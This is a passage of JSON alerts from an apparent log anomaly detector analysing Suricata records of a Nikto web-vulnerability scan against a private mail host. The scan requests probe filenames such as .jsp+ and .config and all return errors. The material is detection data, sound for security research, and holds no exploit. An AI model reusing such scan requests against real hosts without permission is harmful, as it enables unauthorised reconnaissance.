"\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46950, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":1369948522440834,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 1369948522440834, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.355425+0000\",\"flow_id\":1369948522440834,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46950,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.jsp+\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.jsp+\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.358195 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46952 -> 192.168.10.154:80", "/parser/model/time": 1583349514.358195, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46952, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.358195 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46952 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.de", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.358924+0000\",\"flow_id\":583080449044546,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.358924, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":583080449044546,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.de\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.de\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.de", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.de", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46952, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":583080449044546,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 583080449044546, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.358924+0000\",\"flow_id\":583080449044546,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46952,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.de\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.de\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.361389 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46954 -> 192.168.10.154:80", "/parser/model/time": 1583349514.361389, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46954, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.361389 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46954 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.en", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.361649+0000\",\"flow_id\":570105352846820,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.361649, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":570105352846820,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.en\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.en\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.en", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.en", "/parser/model/event_type/fileinfo/http/http_user_agent_str": "\",\"http_user_agent\":\"", "/parser/model/event_type/fileinfo/http/http_user_agent": "Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)", "/parser/model/event_type/fileinfo/http/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/http_refer": null, "/parser/model/event_type/fileinfo/http/http_method_str": "\",\"http_method\":\"", "/parser/model/event_type/fileinfo/http/http_method": "GET", "/parser/model/event_type/fileinfo/http/protocol_str": "\",\"protocol\":\"", "/parser/model/event_type/fileinfo/http/protocol": "HTTP\\/1.1", "/parser/model/event_type/fileinfo/http/quote_str": "\"", "/parser/model/event_type/fileinfo/http/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/redirect": null, "/parser/model/event_type/fileinfo/http/length_str": ",\"length\":", "/parser/model/event_type/fileinfo/http/length": 226, "/parser/model/event_type/fileinfo/http/brack_str": "}", "/parser/model/event_type/fileinfo/http/status/status": ",\"status\":400", "/parser/model/event_type/fileinfo/http/status/status/status_str": ",\"status\":", "/parser/model/event_type/fileinfo/http/status/status/status": 400, "/parser/model/event_type/fileinfo/http/content_type/content_type": "\",\"http_content_type\":\"text\\/html", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type_str": "\",\"http_content_type\":\"", "/parser/model/event_type/fileinfo/http/content_type/content_type/http_content_type": "text\\/html", "/parser/model/event_type/fileinfo/conn/src_ip_str": "\"src_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4": "192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_ip": 3232238234, "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port_str": "\",\"src_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/src_port": 80, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip_str": ",\"dest_ip\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_ip": 3232238318, "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port_str": "\",\"dest_port\":", "/parser/model/event_type/fileinfo/conn/ip/ipv4/dest_port": 46954, "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto_str": ",\"proto\":\"", "/parser/model/event_type/fileinfo/conn/ip/ipv4/proto": "TCP", "/parser/model/event_type/fileinfo/conn/ip/ipv4/quote": "\"", "/parser/model/in_iface/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/in_iface/in_iface/in_iface_str": "\"in_iface\":\"", "/parser/model/in_iface/in_iface/in_iface": "eth0", "/parser/model/in_iface/in_iface/comma_str": "\",", "/parser/model/flow_id/flow_id": "\"flow_id\":570105352846820,", "/parser/model/flow_id/flow_id/flow_id_str": "\"flow_id\":", "/parser/model/flow_id/flow_id/flow_id": 570105352846820, "/parser/model/flow_id/flow_id/comma_str": "," } }, "LogData": { "RawLogData": [ "{\"timestamp\":\"2020-03-04T19:18:34.361649+0000\",\"flow_id\":570105352846820,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46954,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.en\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.en\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}" ], "Timestamps": [ 1583349514.36 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 9, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata err message", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_err", "AffectedLogAtomPaths": [ "/parser/model/message", "/parser/model/classification", "/parser/model/priority" ], "AffectedLogAtomValues": [ "SURICATA HTTP METHOD terminated by non-compliant character", "Generic Protocol Command Decode", 3 ], "ParsedLogAtom": { "/parser/model": "03/04/2020-19:18:34.365743 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46956 -> 192.168.10.154:80", "/parser/model/time": 1583349514.365743, "/parser/model/brack_str1": "] {", "/parser/model/id1": 1, "/parser/model/sep1": ":", "/parser/model/id2": 2221030, "/parser/model/sep2": ":", "/parser/model/id3": 1, "/parser/model/sep3": "] ", "/parser/model/message": "SURICATA HTTP METHOD terminated by non-compliant character", "/parser/model/classficiation_str": " [**] [Classification: ", "/parser/model/classification": "Generic Protocol Command Decode", "/parser/model/priority_str": "] [Priority: ", "/parser/model/priority": 3, "/parser/model/conn": "TCP", "/parser/model/brack_str2": "} ", "/parser/model/src_ip": 3232238318, "/parser/model/colon": ":", "/parser/model/src_port": 46956, "/parser/model/arrow_str": " -> ", "/parser/model/dst_ip": 3232238234, "/parser/model/dst_port": 80 } }, "LogData": { "RawLogData": [ "03/04/2020-19:18:34.365743 [**] [1:2221030:1] SURICATA HTTP METHOD terminated by non-compliant character [**] [Classification: Generic Protocol Command Decode] [Priority: 3] {TCP} 192.168.10.238:46956 -> 192.168.10.154:80" ], "Timestamps": [ 1583349514.37 ], "LogLinesCount": 1 } } { "AnalysisComponent": { "AnalysisComponentIdentifier": 11, "AnalysisComponentType": "NewMatchPathValueComboDetector", "AnalysisComponentName": "Suricata fileinfo", "Message": "New value combination(s) detected", "PersistenceFileName": "suricata_fileinfo", "AffectedLogAtomPaths": [ "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename", "/parser/model/event_type/fileinfo/fileinfo/state", "/parser/model/event_type/fileinfo/fileinfo/stored" ], "AffectedLogAtomValues": [ "\\/bISn4adA.config", "CLOSED", 1 ], "ParsedLogAtom": { "/parser/model": "{\"timestamp\":\"2020-03-04T19:18:34.365913+0000\",\"flow_id\":776469941489987,\"in_iface\":\"eth0\",\"event_type\":\"fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/time_str": "{\"timestamp\":\"", "/parser/model/time": 1583349514.365913, "/parser/model/plus_sign": "+", "/parser/model/tz": 0, "/parser/model/comma_str": "\",", "/parser/model/flow_id": "\"flow_id\":776469941489987,", "/parser/model/in_iface": "\"in_iface\":\"eth0\",", "/parser/model/event_type_str": "\"event_type\":\"", "/parser/model/event_type/fileinfo": "fileinfo\",\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226},\"app_proto\":\"http\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo_str": "fileinfo\",", "/parser/model/event_type/fileinfo/conn": "\"src_ip\":\"192.168.10.154\",\"src_port\":80,\"dest_ip\":\"192.168.10.238\",\"dest_port\":46956,\"proto\":\"TCP\"", "/parser/model/event_type/fileinfo/http": ",\"http\":{\"hostname\":\"mail.cup.com\",\"url\":\"\\/bISn4adA.config\",\"http_user_agent\":\"Mozilla\\/5.00 (Nikto\\/2.1.5) (Evasions:6) (Test:map_codes)\",\"http_content_type\":\"text\\/html\",\"http_method\":\"GET\",\"protocol\":\"HTTP\\/1.1\",\"status\":400,\"length\":226}", "/parser/model/event_type/fileinfo/app_proto_str": ",\"app_proto\":\"", "/parser/model/event_type/fileinfo/app_proto": "http", "/parser/model/event_type/fileinfo/fileinfo": "\",\"fileinfo\":{\"filename\":\"\\/bISn4adA.config\",\"state\":\"CLOSED\",\"stored\":false,\"size\":226,\"tx_id\":0}}", "/parser/model/event_type/fileinfo/fileinfo/fileinfo_str": "\",\"fileinfo\":{", "/parser/model/event_type/fileinfo/fileinfo/filename": "\"filename\":\"\\/bISn4adA.config\",", "/parser/model/event_type/fileinfo/fileinfo/state_str": "\"state\":\"", "/parser/model/event_type/fileinfo/fileinfo/state": "CLOSED", "/parser/model/event_type/fileinfo/fileinfo/stored_str": "\",\"stored\":", "/parser/model/event_type/fileinfo/fileinfo/stored": 1, "/parser/model/event_type/fileinfo/fileinfo/size_str": ",\"size\":", "/parser/model/event_type/fileinfo/fileinfo/size": 226, "/parser/model/event_type/fileinfo/fileinfo/tx_id_str": ",\"tx_id\":", "/parser/model/event_type/fileinfo/fileinfo/tx_id": 0, "/parser/model/event_type/fileinfo/fileinfo/brack_str": "}}", "/parser/model/event_type/fileinfo/fileinfo/filename/filename": "\"filename\":\"\\/bISn4adA.config\",", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename_str": "\"filename\":\"", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/filename": "\\/bISn4adA.config", "/parser/model/event_type/fileinfo/fileinfo/filename/filename/quote_str": "\",", "/parser/model/event_type/fileinfo/http/hostname_str": ",\"http\":{\"hostname\":\"", "/parser/model/event_type/fileinfo/http/hostname": "mail.cup.com", "/parser/model/event_type/fileinfo/http/url_str": "\",\"url\":\"", "/parser/model/event_type/fileinfo/http/url": "\\/bISn4adA.config", 